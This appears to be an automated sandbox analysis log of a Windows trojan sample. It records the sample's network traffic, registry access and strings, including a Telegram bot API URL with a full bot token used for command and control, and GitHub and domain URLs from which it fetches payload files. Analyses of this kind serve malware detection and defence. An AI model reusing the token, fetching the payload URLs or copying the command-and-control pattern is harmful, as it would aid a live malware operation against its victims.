    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:52628 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:52632 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:52653 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:52665 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:52803 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:52886 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:52911 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:52924 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:52927 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:52935 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 8.8.8.8:443 -> 192.168.2.5:52938 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:52941 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:52944 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:52947 version: TLS 1.2
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 00000031.00000002.3261750163.00007FF8A6ECB000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 00000031.00000002.3262542690.00007FF8B8B18000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 00000031.00000002.3262542690.00007FF8B8B18000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 00000031.00000002.3262267641.00007FF8B7EC0000.00000002.00000001.01000000.00000011.sdmp
    Source: Binary string: PrintUI.pdb source: curlapp64.exe, 00000005.00000003.2159397966.00000231626E7000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000E.00000002.2704165993.00007FF7BAC82000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000E.00000000.2160549027.00007FF7BAC82000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 00000031.00000002.3262267641.00007FF8B7EC0000.00000002.00000001.01000000.00000011.sdmp
    Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: bav64.exe, 0000003D.00000002.2979358355.000002A41F9AB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: PrintUI.pdbGCTL source: curlapp64.exe, 00000005.00000003.2159397966.00000231626E7000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000000E.00000002.2704165993.00007FF7BAC82000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000E.00000000.2160549027.00007FF7BAC82000.00000002.00000001.01000000.00000007.sdmp
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF745025E64 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF745025E64
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CF9BD2A8 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6CF9BD2A8
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0AC568 FindClose,FindFirstFileExW,GetLastError,55_2_00007FF6BC0AC568
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF6BC0AC5DC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,55_2_00007FF6BC0AC5DC

    Networking

    barindex
    Uses the Telegram API (likely for C&C communication)
    Source: unknownDNS query: name: api.telegram.org
    Source: global trafficTCP traffic: 192.168.2.5:52865 -> 188.116.21.204:5432
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
    Source: global trafficHTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
    Source: global trafficHTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
    Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownDNS query: name: ipinfo.io
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49721
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:52819
    Source: global trafficHTTP traffic detected: POST /bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 94Expect: 100-continueConnection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E664A0 recv,WSAGetLastError,5_2_00007FF8B7E664A0
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioAccept: */*
    Source: global trafficHTTP traffic detected: GET /resolve?name=unvdwl.com HTTP/1.1Host: dns.googleAccept: */*
    Source: global trafficHTTP traffic detected: GET /resolve?name=rootunvdwl.com HTTP/1.1Host: dns.googleAccept: */*
    Source: global trafficDNS traffic detected: DNS query: github.com
    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
    Source: global trafficDNS traffic detected: DNS query: rootunvbot.com
    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
    Source: global trafficDNS traffic detected: DNS query: unvdwl.com
    Source: global trafficDNS traffic detected: DNS query: dns.google
    Source: global trafficDNS traffic detected: DNS query: rootunvdwl.com
    Source: unknownHTTP traffic detected: POST /bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: api.telegram.orgContent-Length: 94Expect: 100-continueConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Tue, 05 Nov 2024 09:48:00 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgrade
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Tue, 05 Nov 2024 09:47:18 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Tue, 05 Nov 2024 09:47:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0 (Ubuntu)Date: Tue, 05 Nov 2024 09:47:36 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-alive
    Source: powershell.exe, 00000046.00000002.2568697905.00000267815FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
    Source: powershell.exe, 00000014.00000002.2235385466.0000020CAF666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
    Source: powershell.exe, 00000014.00000002.2235385466.0000020CAF666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
    Source: svchost.exe, 00000031.00000002.3260353266.0000000064953000.00000008.00000001.01000000.00000014.sdmpString found in binary or memory: http://mingw-w64.sourceforge.net/X
    Source: powershell.exe, 00000014.00000002.2228764088.0000020CA7361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2654496859.0000026790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2654496859.00000267901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000046.00000002.2568697905.0000026780232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: svchost.exe, 00000031.00000002.3261405626.000001B531F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rootunvdwl.com/un2/urestorehard.dat
    Source: powershell.exe, 00000014.00000002.2205494711.0000020C97518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000014.00000002.2205494711.0000020C972F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2568697905.0000026780001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000014.00000002.2205494711.0000020C97518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: curlapp64.exe, 00000005.00000002.2165249434.000002316268C000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000009.00000002.2276560928.00000260AC2F8000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://unvdwl.com/un2/botprnt.dat
    Source: curlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://unvdwl.com/un2/botprnt.datZ
    Source: curlapp64.exe, 00000009.00000002.2276560928.00000260AC2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://unvdwl.com/un2/botprnt.datsInfo
    Source: svchost.exe, 00000031.00000002.3261405626.000001B531F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://unvdwl.com/un2/urestorehard.dat
    Source: powershell.exe, 00000046.00000002.2568697905.0000026781687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000046.00000002.2568697905.0000026780232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: svchost.exe, 00000031.00000002.3260796016.00000000682A4000.00000008.00000001.01000000.00000013.sdmp, libintl-9.dll.14.drString found in binary or memory: http://www.gnu.org/licenses/
    Source: curlapp64.exe, svchost.exeString found in binary or memory: http://www.zlib.net/
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeString found in binary or memory: http://www.zlib.net/D
    Source: powershell.exe, 00000014.00000002.2205494711.0000020C972F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2568697905.0000026780001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000046.00000002.2568697905.0000026781635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
    Source: powershell.exe, 00000046.00000002.2568697905.0000026780C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
    Source: printui.exe, 0000000E.00000002.2703991121.000001CC7B6A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessY
    Source: powershell.exe, 00000046.00000002.2666814994.00000267FB950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage
    Source: powershell.exe, 00000046.00000002.2678627235.00000267FDA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7607027553:aahrudqnba23c1me3ecfjgijnq0h1nbcp5y/sendmessage
    Source: powershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: curlapp64.exe, svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drString found in binary or memory: https://curl.se/V
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: curlapp64.exe, svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: curlapp64.exe, svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/copyright.html
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drString found in binary or memory: https://curl.se/docs/hsts.html
    Source: curlapp64.exe, svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: curlapp64.exe, svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: svchost.exe, 00000031.00000002.3262019634.00007FF8A70CE000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, console_zero.exe, 00000037.00000000.2514449211.00007FF6BC0D3000.00000002.00000001.01000000.00000017.sdmp, console_zero.exe, 00000037.00000002.2585885663.00007FF6BC0D3000.00000002.00000001.01000000.00000017.sdmp, console_zero.exe, 00000047.00000002.2703380660.00007FF6BC0D3000.00000002.00000001.01000000.00000017.sdmp, console_zero.exe, 00000047.00000000.2541271400.00007FF6BC0D3000.00000002.00000001.01000000.00000017.sdmp, SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeString found in binary or memory: https://dns.google/resolve?name=
    Source: powershell.exe, 00000046.00000002.2568697905.0000026780232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: curlapp64.exe, 00000005.00000002.2165249434.000002316268C000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000009.00000002.2276560928.00000260AC304000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat
    Source: curlapp64.exe, 00000005.00000002.2165249434.00000231626A3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat.1
    Source: curlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat:
    Source: curlapp64.exe, 00000005.00000002.2165249434.000002316268C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datM
    Source: curlapp64.exe, 00000009.00000002.2276560928.00000260AC304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datP#
    Source: curlapp64.exe, 00000009.00000002.2276560928.00000260AC304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dath#
    Source: curlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datl
    Source: curlapp64.exe, 00000005.00000002.2165249434.000002316268C000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datll
    Source: svchost.exe, 00000031.00000002.3261112919.000001B531C13000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/uamd.dat
    Source: svchost.exe, 00000031.00000002.3261137440.000001B531C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.3145802717.000001B531CEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3261311476.000001B531CEE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpu.dat
    Source: svchost.exe, 00000031.00000002.3261137440.000001B531C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.3145802717.000001B531CEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3261311476.000001B531CEE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpusys.dat
    Source: svchost.exe, 00000031.00000002.3261112919.000001B531C13000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/unv.dat
    Source: svchost.exe, 00000031.00000002.3261463966.000001B531F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvd01/unvmain/raw/refs/heads/main/un2/uusb.dat
    Source: svchost.exe, 00000031.00000002.3261227010.000001B531C84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3261405626.000001B531F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.dat
    Source: svchost.exe, 00000031.00000002.3261227010.000001B531C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datcept
    Source: svchost.exe, 00000031.00000002.3261405626.000001B531F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datf
    Source: powershell.exe, 00000046.00000002.2568697905.0000026780C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: svchost.exe, 00000031.00000002.3262019634.00007FF8A70CE000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://ipinfo.io/json
    Source: svchost.exe, 00000031.00000002.3262019634.00007FF8A70CE000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://ipinfo.io/jsonhardware_manager::download_json_error:
    Source: powershell.exe, 00000014.00000002.2228764088.0000020CA7361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2654496859.0000026790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2654496859.00000267901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000046.00000002.2568697905.0000026781687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
    Source: powershell.exe, 00000046.00000002.2568697905.0000026781687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
    Source: curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.c
    Source: svchost.exe, 00000031.00000002.3261330256.000001B531CF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/ubotrestorehard.dat
    Source: svchost.exe, 00000031.00000002.3261405626.000001B531F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/ubotrestorehard.datGMT
    Source: curlapp64.exe, 00000017.00000002.2359306959.00000183078B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botpr
    Source: curlapp64.exe, 00000009.00000002.2276560928.00000260AC324000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprP1/
    Source: curlapp64.exe, 00000017.00000003.2358859802.00000183078B2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000002.2359306959.00000183078B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprW
    Source: curlapp64.exe, 00000017.00000003.2358859802.000001830789A000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000002.2359306959.00000183078B2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000003.2313810393.00000183078CA000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000003.2293196178.00000183078C4000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000017.00000003.2319520391.00000183078BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
